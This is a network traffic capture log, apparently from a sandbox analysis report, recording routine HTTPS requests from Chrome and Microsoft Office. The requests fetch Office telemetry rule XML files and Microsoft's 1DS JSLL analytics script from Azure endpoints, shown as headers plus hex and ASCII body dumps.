                                                                                                                                                                        2024-11-24 04:12:07 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        117192.168.2.74985213.107.246.634436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:07 UTC454OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                        Host: js.monitor.azure.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        If-None-Match: 0x8DCEC757C1AD1D1
                                                                                                                                                                        If-Modified-Since: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                        2024-11-24 04:12:08 UTC807INHTTP/1.1 304 Not Modified
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:08 GMT
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                        Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                        ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                        x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        x-azure-ref: 20241124T041208Z-178bfbc474btrnf9hC1NYCb80g00000005ng000000005q4g
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        118192.168.2.74985313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:08 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:09 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                        x-ms-request-id: e88bdfa1-301e-003f-630e-3d266f000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041209Z-178bfbc474bq2pr7hC1NYCkfgg00000005k000000000axxe
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:09 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        119192.168.2.74985413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:09 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:09 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1427
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                                                                                                        x-ms-request-id: ee240466-601e-00ab-24f2-3a66f4000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041209Z-178bfbc474bwh9gmhC1NYCy3rs00000005fg00000000c0vf
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:09 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        120192.168.2.74985613.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:09 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:09 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                        x-ms-request-id: 3385e8da-101e-00a2-400c-3d9f2e000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041209Z-178bfbc474brk967hC1NYCfu60000000054g00000000k3eb
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:09 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        121192.168.2.74985513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:09 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:09 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1390
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                        ETag: "0x8DC582BE3002601"
                                                                                                                                                                        x-ms-request-id: 3cbcbade-201e-0000-6443-3ca537000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041209Z-15b8b599d88hd9g7hC1TEBp75c00000003z0000000002rt5
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:10 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        122192.168.2.74985713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:09 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:09 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                        x-ms-request-id: 30cd57e9-201e-003c-48f3-3c30f9000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041209Z-178bfbc474bbbqrhhC1NYCvw7400000005qg000000000cw5
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:09 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        123192.168.2.74986913.107.246.634436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:10 UTC427OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                        Host: js.monitor.azure.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        Range: bytes=179335-179335
                                                                                                                                                                        If-Range: 0x8DCEC757C1AD1D1
                                                                                                                                                                        2024-11-24 04:12:10 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:10 GMT
                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                        Content-Length: 207935
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                        Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                        ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                        x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        x-azure-ref: 20241124T041210Z-178bfbc474b7cbwqhC1NYC8z4n00000005ag00000000b3qv
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:10 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                        Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                        2024-11-24 04:12:10 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                        Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                        2024-11-24 04:12:10 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                        Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                        2024-11-24 04:12:10 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                        Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                        2024-11-24 04:12:10 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                        Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
